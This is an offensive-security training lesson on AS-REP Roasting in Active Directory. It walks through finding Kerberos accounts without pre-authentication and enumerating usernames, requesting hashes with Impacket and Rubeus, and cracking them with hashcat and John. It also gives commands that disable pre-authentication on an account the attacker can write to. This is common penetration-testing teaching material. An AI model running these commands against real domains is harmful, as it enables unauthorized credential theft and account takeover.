AS-REP Roasting

intermediate30 minWriteup

Attacking accounts without pre-authentication

Learning Objectives

  • Find accounts without pre-auth
  • Request AS-REP hashes
  • Crack AS-REP responses
  • Identify vulnerable accounts

AS-REP Roasting is

sibling attack. While Kerberoasting targets service accounts with SPNs, AS-REP Roasting targets accounts that don't require Kerberos pre-authentication.

The best part? You don't even need valid domain credentials. Just a list of usernames is enough to request crackable hashes for vulnerable accounts.

Pre-Authentication Explained

Normally, Kerberos requires you to prove you know the password BEFORE giving you a ticket (pre-auth). When this is disabled, the KDC gives you an encrypted ticket for free - crackable offline.

How AS-REP Roasting Works

1Normal Kerberos (Pre-Auth Enabled):
21. User sends AS-REQ with timestamp encrypted with password hash
32. KDC verifies timestamp (proves user knows password)
43. KDC sends AS-REP with TGT
5 
6AS-REP Roasting (Pre-Auth Disabled):
71. Attacker sends AS-REQ for target user (no proof needed!)
82. KDC happily sends AS-REP with encrypted TGT
93. Part of AS-REP is encrypted with user's hash
104. Attacker cracks offline
11 
12The attackable part:
13enc-part of AS-REP = encrypted with user's hash = crackable!

Finding Vulnerable Accounts

With Domain Credentials

powershell
1606070;"># PowerShell AD Module
2Get-ADUser -Filter {DoesNotRequirePreAuth -eq $True} -Properties DoesNotRequirePreAuth
3 
4606070;"># PowerView
5Get-DomainUser -PreauthNotRequired
6 
7606070;"># LDAP query
8$search = New-Object DirectoryServices.DirectorySearcher
9$search.Filter = 606070;">#a5d6ff;">"(&(objectClass=user)(userAccountControl:1.2.840.113556.1.4.803:=4194304))"
10$search.FindAll()
bash
1606070;"># Impacket (with creds)
2GetNPUsers.py corp.local/user:password -dc-ip 192.168.1.10
3 
4606070;"># ldapsearch
5ldapsearch -x -H ldap:606070;">//dc.corp.local -D "user@corp.local" -w 'pass' \
6  -b 606070;">#a5d6ff;">"DC=corp,DC=local" "(&(objectClass=user)(userAccountControl:1.2.840.113556.1.4.803:=4194304))"

Without Credentials

You can test usernames without authentication. If pre-auth is disabled, the KDC returns an AS-REP. If enabled, it returns an error.

bash
1606070;"># Test usernames from list (no creds needed!)
2GetNPUsers.py corp.local/ -usersfile users.txt -no-pass -dc-ip 192.168.1.10
3 
4606070;"># The tool will:
5606070;"># - Request AS-REP for each user
6606070;"># - Get hash if pre-auth disabled
7606070;"># - Get error if pre-auth enabled (confirms valid user!)

Username Enumeration Bonus

Even if pre-auth is enabled, the error message differs for valid vs invalid users. You get user enumeration for free!

Performing the Attack

From Windows

powershell
1606070;"># Rubeus
2.\Rubeus.exe asreproast /format:hashcat /outfile:asrep.txt
3 
4606070;"># Target specific user
5.\Rubeus.exe asreproast /user:vulnerable_user /format:hashcat
6 
7606070;"># From non-domain-joined machine
8.\Rubeus.exe asreproast /domain:corp.local /dc:dc.corp.local /format:hashcat

From Linux

bash
1606070;"># With credentials
2GetNPUsers.py corp.local/user:password -dc-ip 192.168.1.10 -request -outputfile asrep.txt
3 
4606070;"># Without credentials (user list)
5GetNPUsers.py corp.local/ -usersfile users.txt -no-pass -dc-ip 192.168.1.10 -outputfile asrep.txt
6 
7606070;"># Target specific user (no creds)
8GetNPUsers.py corp.local/target_user -no-pass -dc-ip 192.168.1.10

Cracking AS-REP Hashes

bash
1606070;"># Hashcat mode 18200 = Kerberos 5 AS-REP
2hashcat -m 18200 asrep.txt /usr/share/wordlists/rockyou.txt
3 
4606070;"># With rules
5hashcat -m 18200 asrep.txt rockyou.txt -r best64.rule
6 
7606070;"># John the Ripper
8john --format=krb5asrep --wordlist=rockyou.txt asrep.txt

Cracking Speed

AS-REP hashes crack slightly slower than TGS (Kerberoast) hashes, but still at millions per second on a decent GPU.

AS-REP Roasting Methodology

AS-REP Roasting Flow

1
Get UsernamesOSINT, LDAP enum, or password spray results
2
Test Pre-AuthRequest AS-REP for each user
3
Collect HashesSave hashes for vulnerable accounts
4
CrackHashcat mode 18200 with wordlists
5
Use CredsAuthenticate with cracked passwords

Setting the Vulnerability

If you have write access to a user (GenericAll, GenericWrite), you can MAKE them vulnerable to AS-REP Roasting!

powershell
1606070;"># Enable "Do not require Kerberos preauthentication"
2Set-ADAccountControl -Identity targetuser -DoesNotRequirePreAuth $true
3 
4606070;"># PowerView
5Set-DomainObject -Identity targetuser -XOR @{userAccountControl=4194304}
6 
7606070;"># Now you can AS-REP Roast them!

This is an Attack Technique

Modifying accounts to disable pre-auth is detectable. Use this when you have write access but not password reset rights.

Kerberoasting vs AS-REP Roasting

AspectKerberoastingAS-REP Roasting
TargetAccounts with SPNsAccounts without pre-auth
Credentials NeededAny domain userJust username list
Hashcat Mode13100 / 1970018200
PrevalenceVery commonLess common

Knowledge Check

Quick Quiz
Question 1 of 3

What makes an account vulnerable to AS-REP Roasting?

Challenges

No Creds Required

Challenge
🔥 intermediate

Using only a list of potential usernames, identify which accounts are vulnerable to AS-REP Roasting and crack at least one.

Need a hint? (4 available)

Key Takeaways

  • AS-REP Roasting targets accounts without pre-authentication required
  • No domain credentials needed - just a username list
  • Use hashcat mode 18200 for cracking
  • If you can modify a user, you can enable the vulnerability
  • Less common than Kerberoasting but still valuable
  • Username enumeration is a bonus side effect